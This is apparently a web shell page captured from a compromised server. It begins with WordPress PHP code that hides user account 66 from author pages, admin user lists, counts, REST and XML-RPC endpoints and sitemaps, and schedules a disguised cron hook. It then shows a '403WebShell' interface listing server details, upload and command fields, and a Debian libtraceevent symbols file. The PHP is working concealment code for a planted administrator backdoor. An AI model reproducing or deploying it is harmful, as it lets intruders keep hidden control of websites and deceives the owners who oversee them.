add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 66; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 66 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 66 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 66; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 66; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/66(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); 403WebShell
403Webshell
Server IP : 167.235.224.122  /  Your IP : 216.73.216.110
Web Server : Apache/2.4.58 (Ubuntu)
System : Linux newplayground 6.8.0-136-generic #136-Ubuntu SMP PREEMPT_DYNAMIC Wed Jul 1 21:33:11 UTC 2026 aarch64
User : deploy ( 1000)
PHP Version : 8.4.23
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : OFF
Directory :  /var/lib/dpkg/info/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/lib/dpkg/info/libtraceevent1:arm64.symbols
libtraceevent.so.1 libtraceevent1 #MINVER#
 __pr_stat@Base 5.4
 __tep_vprint@Base 1:1.3.3
 __vpr_stat@Base 5.4
 breakpoint@Base 5.4
 get_field_val@Base 5.4
 kbuffer_alloc@Base 5.4
 kbuffer_curr_index@Base 5.4
 kbuffer_curr_offset@Base 5.4
 kbuffer_curr_size@Base 5.4
 kbuffer_dup@Base 1:1.8.1
 kbuffer_event_size@Base 5.4
 kbuffer_free@Base 5.4
 kbuffer_load_subbuffer@Base 5.4
 kbuffer_missed_events@Base 5.4
 kbuffer_next_event@Base 5.4
 kbuffer_ptr_delta@Base 5.8
 kbuffer_raw_get@Base 5.4
 kbuffer_read_at_offset@Base 5.4
 kbuffer_read_buffer@Base 1:1.8.1
 kbuffer_read_event@Base 5.4
 kbuffer_refresh@Base 1:1.8.1
 kbuffer_set_old_format@Base 5.4
 kbuffer_start_of_data@Base 5.4
 kbuffer_subbuf_timestamp@Base 5.8
 kbuffer_subbuffer@Base 1:1.8.1
 kbuffer_subbuffer_size@Base 5.4
 kbuffer_timestamp@Base 5.4
 kbuffer_translate_data@Base 5.4
 pr_stat@Base 5.4
 tep_add_plugin_path@Base 5.9~rc1
 tep_alloc@Base 5.4
 tep_clear_flag@Base 5.4
 tep_cmdline_pid@Base 5.4
 tep_data_comm_from_pid@Base 5.4
 tep_data_flags@Base 5.4
 tep_data_pid@Base 5.4
 tep_data_pid_from_comm@Base 5.4
 tep_data_preempt_count@Base 5.4
 tep_data_type@Base 5.4
 tep_event_common_fields@Base 5.4
 tep_event_fields@Base 5.4
 tep_event_filtered@Base 5.4
 tep_filter_add_filter_str@Base 5.4
 tep_filter_alloc@Base 5.4
 tep_filter_compare@Base 5.4
 tep_filter_copy@Base 5.4
 tep_filter_free@Base 5.4
 tep_filter_make_string@Base 5.4
 tep_filter_match@Base 5.4
 tep_filter_remove_event@Base 5.4
 tep_filter_reset@Base 5.4
 tep_filter_strerror@Base 5.4
 tep_find_any_field@Base 5.4
 tep_find_common_field@Base 5.4
 tep_find_event@Base 5.4
 tep_find_event_by_name@Base 5.4
 tep_find_event_by_record@Base 5.4
 tep_find_field@Base 5.4
 tep_find_function@Base 5.4
 tep_find_function_address@Base 5.4
 tep_find_function_info@Base 1:1.7.0
 tep_free@Base 5.4
 tep_get_any_field_val@Base 5.4
 tep_get_common_field_val@Base 5.4
 tep_get_cpus@Base 5.4
 tep_get_event@Base 5.4
 tep_get_events_count@Base 5.4
 tep_get_field_raw@Base 5.4
 tep_get_field_val@Base 5.4
 tep_get_first_event@Base 5.4
 tep_get_function_count@Base 1:1.6.0
 tep_get_header_page_size@Base 5.4
 tep_get_header_timestamp_size@Base 5.4
 tep_get_long_size@Base 5.4
 tep_get_page_size@Base 5.4
 tep_get_ref@Base 5.4
 tep_get_sub_buffer_commit_offset@Base 1:1.8.1
 tep_get_sub_buffer_data_size@Base 1:1.8.1
 tep_get_sub_buffer_size@Base 1:1.5.1
 tep_info@Base 1:1.3.0
 tep_is_file_bigendian@Base 5.4
 tep_is_local_bigendian@Base 5.4
 tep_is_old_format@Base 5.4
 tep_is_pid_registered@Base 5.4
 tep_kbuffer@Base 1:1.7.0
 tep_list_events@Base 5.4
 tep_list_events_copy@Base 5.4
 tep_load_plugins@Base 5.4
 tep_load_plugins_hook@Base 5.9~rc1
 tep_override_comm@Base 5.4
 tep_parse_event@Base 5.4
 tep_parse_format@Base 5.4
 tep_parse_header_page@Base 5.4
 tep_parse_kallsyms@Base 1:1.2.1
 tep_parse_printk_formats@Base 1:1.2.1
 tep_parse_saved_cmdlines@Base 1:1.2.1
 tep_plugin_add_option@Base 5.9~rc1
 tep_plugin_add_options@Base 5.4
 tep_plugin_free_options_list@Base 5.4
 tep_plugin_list_options@Base 5.4
 tep_plugin_print_options@Base 5.9~rc1
 tep_plugin_remove_options@Base 5.4
 tep_print_event@Base 5.4
 tep_print_field@Base 5.4
 tep_print_field_content@Base 1:1.5.1
 tep_print_fields@Base 5.4
 tep_print_func_field@Base 5.4
 tep_print_funcs@Base 5.4
 tep_print_num_field@Base 5.4
 tep_print_plugins@Base 5.4
 tep_print_printk@Base 5.4
 tep_read_number@Base 5.4
 tep_read_number_field@Base 5.4
 tep_record_is_event@Base 1:1.8.1
 tep_record_print_fields@Base 1:1.5.1
 tep_record_print_selected_fields@Base 1:1.5.1
 tep_ref@Base 5.4
 tep_register_comm@Base 5.4
 tep_register_event_handler@Base 5.4
 tep_register_function@Base 5.4
 tep_register_print_function@Base 5.4
 tep_register_print_string@Base 5.4
 tep_reset_function_resolver@Base 5.4
 tep_set_cpus@Base 5.4
 tep_set_file_bigendian@Base 5.4
 tep_set_flag@Base 5.4
 tep_set_function_resolver@Base 5.4
 tep_set_local_bigendian@Base 5.4
 tep_set_loglevel@Base 1:1.3.0
 tep_set_long_size@Base 5.4
 tep_set_page_size@Base 5.4
 tep_set_test_filters@Base 5.4
 tep_strerror@Base 5.4
 tep_test_flag@Base 5.4
 tep_unload_plugins@Base 5.4
 tep_unref@Base 5.4
 tep_unregister_event_handler@Base 5.4
 tep_unregister_print_function@Base 5.4
 tep_vprint@Base 1:1.3.0
 tep_vwarning@Base 1:1.2.1
 tep_warning@Base 1:1.2.1
 trace_seq_destroy@Base 5.4
 trace_seq_do_fprintf@Base 5.4
 trace_seq_do_printf@Base 5.4
 trace_seq_init@Base 5.4
 trace_seq_printf@Base 5.4
 trace_seq_putc@Base 5.4
 trace_seq_puts@Base 5.4
 trace_seq_reset@Base 5.4
 trace_seq_terminate@Base 5.4
 trace_seq_vprintf@Base 5.4
 vpr_stat@Base 5.4

Youez - 2016 - github.com/yon3zu
LinuXploit